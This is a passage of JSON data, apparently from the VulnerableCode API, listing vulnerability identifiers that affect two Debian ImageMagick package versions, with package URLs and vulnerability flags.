"VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-4urn-ywwt-ayeg" }, { "vulnerability": "VCID-5114-9n17-pkd1" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-57gx-fkgs-f7cb" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5fc9-tutn-dubw" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5u53-66es-vkbv" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5y72-4n85-qyeb" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-65b6-jbxy-gudt" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6d5n-tv5h-xkhj" }, { "vulnerability": "VCID-6gh6-3g99-x7hz" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6hay-bjuv-nygd" }, { "vulnerability": "VCID-6jnv-nnkm-v7a3" }, { "vulnerability": "VCID-6kep-3ygd-hkbn" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6wy3-xwez-vfej" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6yn4-p8f4-pbh1" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-73j4-24p8-pbe5" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-78zg-am5w-gugh" }, { "vulnerability": "VCID-79w4-fqmh-j3bk" }, { "vulnerability": "VCID-7dqc-1d5h-uybs" }, { "vulnerability": "VCID-7eeu-wtkq-dyc1" }, { "vulnerability": "VCID-7fw6-fzyj-7qf3" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7jvc-54zg-pbcz" }, { "vulnerability": "VCID-7jx8-htkz-7qd4" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7vrs-x5dn-sbcm" }, { "vulnerability": "VCID-7ynu-qf57-ykba" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-872v-6z75-jucm" }, { "vulnerability": "VCID-8862-dh13-hyga" }, { "vulnerability": "VCID-8an6-y8xy-pyf3" }, { "vulnerability": "VCID-8j37-fwz2-bfea" }, { "vulnerability": "VCID-8jgu-2tx3-gkcb" }, { "vulnerability": "VCID-8n3f-ass1-97gj" }, { "vulnerability": "VCID-8v7y-kcz2-bbb9" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-93a6-7956-v3ar" }, { "vulnerability": "VCID-93em-sxxc-j3ep" }, { "vulnerability": "VCID-99f6-k1y9-x7ba" }, { "vulnerability": "VCID-9akb-t56u-4yhr" }, { "vulnerability": "VCID-9ark-hra3-zyh9" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-9n1x-qw25-mbhf" }, { "vulnerability": "VCID-9pr7-aw96-cqfb" }, { "vulnerability": "VCID-9xbc-3nhd-cygp" }, { "vulnerability": "VCID-9z34-j85g-9kej" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-aycq-4vqg-ubgp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b7dh-gjtk-qfhn" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bf7n-dsx6-rqa2" }, { "vulnerability": "VCID-bge6-p7sc-dqdu" }, { "vulnerability": "VCID-bhkh-rppj-1bb5" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c11x-uq25-17b1" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-chgt-azpf-auba" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-crpp-9mt6-nbb6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-cuyh-2uau-1yad" }, { "vulnerability": "VCID-cwez-6cgj-17gz" }, { "vulnerability": "VCID-cz1h-x2a4-zkhj" }, { "vulnerability": "VCID-d74a-pd2n-6khw" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dge7-469z-u7gq" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dkf5-8kww-mkhn" }, { "vulnerability": "VCID-dkzb-3u3f-yuee" }, { "vulnerability": "VCID-dsee-yrq9-cuca" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-dvvt-ud6y-ffe8" }, { "vulnerability": "VCID-dzxx-5pbd-fqc4" }, { "vulnerability": "VCID-e3av-cqc9-dye1" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb86-ytt7-j3gf" }, { "vulnerability": "VCID-ee5d-s8eb-tbdn" }, { "vulnerability": "VCID-eeah-xwrp-f3b5" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-ekgu-5zg9-2uaa" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-envn-rnvj-4yd2" }, { "vulnerability": "VCID-ep6g-44qy-5qd7" }, { "vulnerability": "VCID-eqr7-q1ga-8kcr" }, { "vulnerability": "VCID-es5w-6nr6-73cn" }, { "vulnerability": "VCID-et5y-g25w-4qay" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-f9z9-h8bt-9bg7" }, { "vulnerability": "VCID-fbta-m4mx-jfap" }, { "vulnerability": "VCID-fd5j-v9vt-5fbu" }, { "vulnerability": "VCID-fds9-yfxw-gqgs" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzct-psgq-8fcb" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g2k2-5sn8-t7dz" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g6mw-mvbu-fbcs" }, { "vulnerability": "VCID-g6sp-5zkq-dkf9" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-gq8m-6nq9-4bcq" }, { "vulnerability": "VCID-gqgz-418x-skd3" }, { "vulnerability": "VCID-gqky-zdxn-e3gd" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h6ps-ukb8-qfa9" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hcjv-e7jt-nbbp" }, { "vulnerability": "VCID-hcxd-bker-sqc1" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hry9-mkha-nfct" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-hzr4-8x4m-87cy" }, { "vulnerability": "VCID-j1jt-g5m8-ffbh" }, { "vulnerability": "VCID-jbhc-41ed-guap" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jcmt-5fes-jug2" }, { "vulnerability": "VCID-je5t-8uuq-ekdk" }, { "vulnerability": "VCID-jjzy-ch18-qkfp" }, { "vulnerability": "VCID-jkdz-rbkr-pygc" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jume-bjh7-f3hr" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-jz9p-mte7-vfb3" }, { "vulnerability": "VCID-k1pr-h6c7-2fgp" }, { "vulnerability": "VCID-k1v6-jp8s-pye7" }, { "vulnerability": "VCID-k7ku-8uya-kbeu" }, { "vulnerability": "VCID-kd82-724m-77h8" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-kq6x-z56m-wqhh" }, { "vulnerability": "VCID-kxus-63yw-sufe" }, { "vulnerability": "VCID-m31q-v2ue-zyh1" }, { "vulnerability": "VCID-m9bk-66wv-vqbk" }, { "vulnerability": "VCID-mcry-3vgm-kyh1" }, { "vulnerability": "VCID-mg1t-vz1h-47b9" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mn7e-8e4j-dqba" }, { "vulnerability": "VCID-mt9h-kjh8-kbdu" }, { "vulnerability": "VCID-mvga-q2ts-mqdh" }, { "vulnerability": "VCID-mwf4-u6v6-zqdu" }, { "vulnerability": "VCID-mws6-wym5-d3f6" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-n59p-w7sh-sbhb" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-ngzz-mwp9-rkdv" }, { "vulnerability": "VCID-nnmr-dnnk-qkc4" }, { "vulnerability": "VCID-nsfn-bhe3-cbd4" }, { "vulnerability": "VCID-nsn7-a7z8-1qcd" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-ny9s-4kcr-tbf4" }, { "vulnerability": "VCID-nzh5-tng5-8qdq" }, { "vulnerability": "VCID-p3p3-suuz-dycr" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p5f8-45e4-ybex" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-paf4-ycea-buae" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-ph82-atva-6kgd" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-pnk5-26uq-w3cu" }, { "vulnerability": "VCID-ps6p-v38m-6qe3" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-pthp-wza7-hkgm" }, { "vulnerability": "VCID-punt-nwt4-uqea" }, { "vulnerability": "VCID-pwhs-ep5j-pqa7" }, { "vulnerability": "VCID-pydk-g827-guc5" }, { "vulnerability": "VCID-q2zg-jh8m-tua2" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qjrj-rdqd-uqdy" }, { "vulnerability": "VCID-qp4x-w3fe-hyer" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rf1t-45cj-mue1" }, { "vulnerability": "VCID-rhpj-r7ym-7kdn" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rwat-s4hf-v7bv" }, { "vulnerability": "VCID-rxgw-h3br-b7dy" }, { "vulnerability": "VCID-rypf-qy6p-3bac" }, { "vulnerability": "VCID-ryu7-2nsu-kqf6" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-rzvc-hba1-zfcy" }, { "vulnerability": "VCID-rzz2-km3v-b3hw" }, { "vulnerability": "VCID-s4cu-swuc-9fh4" }, { "vulnerability": "VCID-s4p8-s262-fqfx" }, { "vulnerability": "VCID-s543-mazj-fqfd" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sat2-d6u2-f3c9" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-sdwh-3s12-17fr" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-szhs-nysy-6bap" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-t4gn-rwz1-ykcf" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-thbh-m54e-z7ca" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tms4-1k6m-cqgd" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tnb2-7mvf-sqdk" }, { "vulnerability": "VCID-tnnn-bg52-93a9" }, { "vulnerability": "VCID-trt9-1y65-53en" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-tv6b-u42h-xkh2" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-tzpa-13fk-7kc9" }, { "vulnerability": "VCID-u23c-4px5-c3g9" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-u9um-rar7-97e8" }, { "vulnerability": "VCID-u9v8-n717-fyag" }, { "vulnerability": "VCID-uatu-64df-b7b8" }, { "vulnerability": "VCID-uayc-3r68-tudp" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-umnw-ksa8-9ua8" }, { "vulnerability": "VCID-upce-8s7m-2kfk" }, { "vulnerability": "VCID-ur14-3rbn-j3ev" }, { "vulnerability": "VCID-urv8-ve9y-e3b4" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v24g-h7t5-nbec" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-v7m7-26bu-wfer" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vbgc-23c4-77hu" }, { "vulnerability": "VCID-vd3a-e897-8bfn" }, { "vulnerability": "VCID-vdum-127b-qfbq" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vp4y-qhc4-nuat" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-vzru-smr4-5kfk" }, { "vulnerability": "VCID-w44j-ecnr-mkhv" }, { "vulnerability": "VCID-w5bd-tn21-fqh7" }, { "vulnerability": "VCID-w8d2-r2ct-m7gv" }, { "vulnerability": "VCID-wbx1-wdxc-k3bc" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-wwxb-6psb-xybx" }, { "vulnerability": "VCID-x3wb-64kk-gues" }, { "vulnerability": "VCID-x65n-6vuk-4ufk" }, { "vulnerability": "VCID-x6sg-6k7v-9qd8" }, { "vulnerability": "VCID-x7us-26aq-3yf8" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xaef-x656-fqfq" }, { "vulnerability": "VCID-xgu5-jypk-h3bd" }, { "vulnerability": "VCID-xgzr-fhu9-myed" }, { "vulnerability": "VCID-xk7c-7f1m-sqe5" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xp3x-q8w4-myhb" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-xtq9-fvcv-kfat" }, { "vulnerability": "VCID-xy5b-m3h2-hbfj" }, { "vulnerability": "VCID-y2nm-f9vb-d7ez" }, { "vulnerability": "VCID-y2pd-cxmz-6yfp" }, { "vulnerability": "VCID-y3xr-bv9y-mqb5" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-ydbk-11w9-wyen" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yqzg-rzp1-bbgm" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-yxwd-j8uj-tudx" }, { "vulnerability": "VCID-z7e5-pt2s-x3a5" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zfw4-5zqw-huh7" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zjgp-g783-d3hy" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zrkc-cfnt-r7hr" }, { "vulnerability": "VCID-zrtt-8nnj-v3ch" }, { "vulnerability": "VCID-zs46-dubn-wfga" }, { "vulnerability": "VCID-zszf-nytw-jqgx" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" }, { "vulnerability": "VCID-zyg9-ad7g-ayex" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.7.4%252Bdfsg-11%252Bdeb9u8" }, { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": 